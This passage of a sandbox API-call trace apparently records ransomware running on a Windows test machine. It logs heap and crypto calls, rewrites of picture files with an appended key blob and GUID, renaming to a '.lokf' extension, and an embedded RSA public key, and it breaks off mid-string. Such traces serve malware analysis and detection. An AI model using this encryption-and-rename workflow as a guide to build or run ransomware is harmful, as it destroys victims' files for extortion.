1 [0059.219] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.219] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.219] GetLastError () returned 0x0 [0059.219] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.219] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.219] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.219] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.219] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6800) returned 0x9c83710 [0059.219] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c834a8 [0059.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4d8 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c834f0 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4f0 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b520 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b538 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.220] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b520 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b538 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b520 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b520 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.221] GetCurrentThreadId () returned 0x9e0 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7e198 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.221] GetCurrentThreadId () returned 0x9e0 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b520 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b538 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b508 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b550 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b520 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b520 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b520 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b550 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b508 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4f0 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c834f0 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.224] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x67f7, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x67f7, lpOverlapped=0x0) returned 1 [0059.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.224] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x67fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.225] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.225] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.225] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.225] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.225] CloseHandle (hObject=0x5cc) returned 1 [0059.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0059.226] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rZNT8ree-9bG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rznt8ree-9bg.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rZNT8ree-9bG.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rznt8ree-9bg.bmp.lokf")) returned 1 [0059.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.227] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.228] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6823c0, ftCreationTime.dwHighDateTime=0x1d4d3e4, ftLastAccessTime.dwLowDateTime=0x92bdb960, ftLastAccessTime.dwHighDateTime=0x1d4d387, ftLastWriteTime.dwLowDateTime=0x92bdb960, ftLastWriteTime.dwHighDateTime=0x1d4d387, nFileSizeHigh=0x0, nFileSizeLow=0xd1e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSPFwFmW70A.png", cAlternateFileName="TSPFWF~1.PNG")) returned 1 [0059.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.228] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TSPFwFmW70A.png") returned=".png" [0059.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TSPFwFmW70A.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tspfwfmw70a.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.228] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=53730) returned 1 [0059.228] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.230] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd1bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.230] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.231] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.231] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd1e2, lpOverlapped=0x0) returned 1 [0059.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.232] lstrlenA (lpString="-----BEGIN PUBLIC 